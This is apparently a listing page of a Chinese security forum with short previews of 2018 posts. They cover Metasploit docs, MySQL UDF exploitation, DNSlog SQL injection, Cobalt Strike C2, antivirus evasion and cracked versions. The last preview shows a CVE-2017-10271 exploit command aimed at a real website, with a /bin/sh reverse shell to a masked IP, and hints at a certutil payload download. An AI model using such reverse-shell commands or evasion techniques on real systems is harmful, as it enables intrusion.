原文地址：https://github.com/rapid7/metasploit-framework/wiki/Using-Git 译者：王一航 & Google 2018-05-15 校对：王一航 2018-05-15 使用下面的资源来在 Metasploit 框架的 Git 仓库上工作。 Cheatsheet Reference Sites Metasploit Deve

王一航 · 9943浏览 · 2018-06-05 07:25

原文地址：https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md 译者：王一航 2018-05-16 校对：王一航 2018-05-16 你好，世界！ 非常感谢您对开发 Metasploit 感兴趣，因此，世界 -- 一个更美好的地方！ 请问您是想要来报告 BUG 吗？这里是我们的 Issue t

王一航 · 9579浏览 · 2018-06-05 07:24

1、MySQL UDF是什么 UDF是Mysql提供给用户实现自己功能的一个接口，为了使UDF机制起作用，函数必须用C或C ++编写，并且操作系统必须支持动态加载。这篇文章主要介绍UDF开发和利用的方法。 2、UDF开发 操作系统:Windows 10 测试环境：PHPStudy+Mysql 5.5(x64) 编译器：VS2015 2.1 编译器方法 MySQL源码包 从MySQL官网下载对应

zzzhhh · 15601浏览 · 2018-05-30 12:45

AssassinGo是一款使用Golang开发，集成了高可用信息收集、基础攻击向量探测、Google-Hacking综合搜索和PoC自定义添加并对目标进行批量检测等功能的自动化Web渗透框架，该框架有着基于Vue的WebGUI，前后端交互主要采用WebSocket技术，会将结果实时显示在前台，并且其可扩展性极强，用户实现各模块接口即可添加自定义功能。 项目网址： https://assassin-

Amyang · 11124浏览 · 2018-05-29 14:37

DnsLogSqlinj Tool : ) 0x00 Why 搜索Dnslog Sql注入，会出来一些科普性的、原理性的、演示性的文章。 都说利用Dnslog注入，解决了盲注不能回显数据，效率低的问题，但关键是，sqlmap能直接进行盲注，期间我可以再去干点其他事情，效率低就低呗，劳动力也没耗死在这，反而是利用Dnslog注入，写语句，看结果，再写语句... 年龄大，体力跟不上，这手工注入，确实

ado · 9680浏览 · 2018-05-28 17:23

Author：bit4@勾陈安全实验室 前言 听说你想用Ceye，而又怕认证？ 听说你想用CloudEye，而又没有注册码？ 听说你想用DNSlog，而又嫌太麻烦？ burp_collaborator_http_api是一个让你可以通过HTTP API调用Burp Suite的Collaborator服务器的插件，让你分分钟用上Burp Suite版本的DNSlog 部署说明 方式一 最简单

勾陈安全 · 8527浏览 · 2018-05-24 13:01

介绍 主要是没找到一款比较好的数据库基线检查工具 索性自己写了一个 https://github.com/wstart/DB_BaseLine DB_BASE 使用说明 帮助信息 python db_baseline.py -h DB_BASELINE 检查规范 根据查阅的资料和文档，基线检查主要分为以下四类 账号权限 检查各个权限账号是否有过多的不必要的权限，检查数据库的文件的权限，是

wstart · 89707浏览 · 2018-04-23 00:02

原文：https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ 正如许多实战经验丰富的渗透测试人员所了解的那样，有时实现C2通信是一件让人非常头痛的事情。无论是从防火墙的出口连接限制还是进程限制的角度来说，反向shell和反向HTTP C2通道的好日子已经不多了。 好吧，也许我这么说确实夸张了些，但有一点是肯定的，

mss**** · 14417浏览 · 2018-04-02 03:25

原文：http://www.offensiveops.io/tools/cobalt-strike-bypassing-windows-defender-with-obfuscation/ 对于所有红队队员来说，在投递有效载荷的时候，总要面临绕过安全软件的检测的挑战。而且，就像其他安全解决方案一样，Windows Defender在检测Cobalt Strike等工具生成的普通有效载荷方面，也变得

mss**** · 30767浏览 · 2018-03-18 02:37

Cobalt strike作为一款渗透测试工具，因其的钓鱼攻击体系的完备性，以及可简单的编写Aggressor-Script（Cobalt strike3）增强或增加其功能，所以在APT以及渗透中有很高的可用性。以下均称之为CS 之前就已经有人分享过Cobalt Strike 3.8破解版 但是经过笔者的一段时间使用后，发现试用版还存在许多的问题。 已知问题： 由于网上绝大多数的CS3.8都是直

lz1y · 49666浏览 · 2018-03-16 03:49

1.1.简要描述 Burpsuite作为web测试中的利器大家都知道，除了其核心的功能外还有部分小功能也是非常的不错，和大家分享一下。（小功能如使用错误,敬请指出,不胜感激。）下面以1.7.31的版本开始： 1.2.Infiltrator 这个功能可能大家不怎么使用不熟悉，我在官网中找到了相关的一些介绍。（注意请勿在生产环境中进行测试！） Infiltrator让Burp 能够检测输入到服务器端

5ecu**** · 10147浏览 · 2018-03-01 05:46

00x00 摘要 Kali-linux系统，渗透测试人员的利器，其官网自称OurMost Advanced Penetration Testing Distribution, Ever. 永远是最先进的渗透测试平台。其中集成了大量的工具，用的好可事半功倍。下面以目前发布的最新版为例，讲一下kali系统的安装与配置，以帮助对kali系统感兴趣的小伙伴。 00x02 安装准备 1) VMware 虚拟

xiaoyue · 8082浏览 · 2018-02-28 07:09

_____ _ ______ _ _____ _ / ___| | | | _ \ (_) / ___| (_) {7kbscan & www.7kb.org} \ `--. _ _| |__ | | | |___ _ __

7kbstorm · 12104浏览 · 2018-02-14 12:55

VPS上搭建Kali linux 在真实渗透环境下往往需要一个稳定、安全、可随时操作的环境，公司不能一直开着，而且还有解决公网IP的问题，这时候我们往往需要一台VPS，但是国内的VPS稍贵，而且不能自定义ISO镜像。所以很多购买VPS之后需要一步一步配置自己需要的渗透环境。那么今天我就介绍一款国外很好用的VPS，并且自定义并且快速安装kali linux。 购买网址： https://www.vu

rootsystem · 18074浏览 · 2018-01-26 01:47

//linux版本执行反弹一句话成功： CVE-2017-10271_linux.py http://www.sohu.com:80/ /bin/sh -i >/dev/tcp/210.73.xx.1/8000 0<&1 2>&1 //win版本的利用方式： 我给个提示，下载exe程序,反弹一个cmdshell回来操作： certutil -urlcache

pt007 · 9947浏览 · 2018-01-05 09:51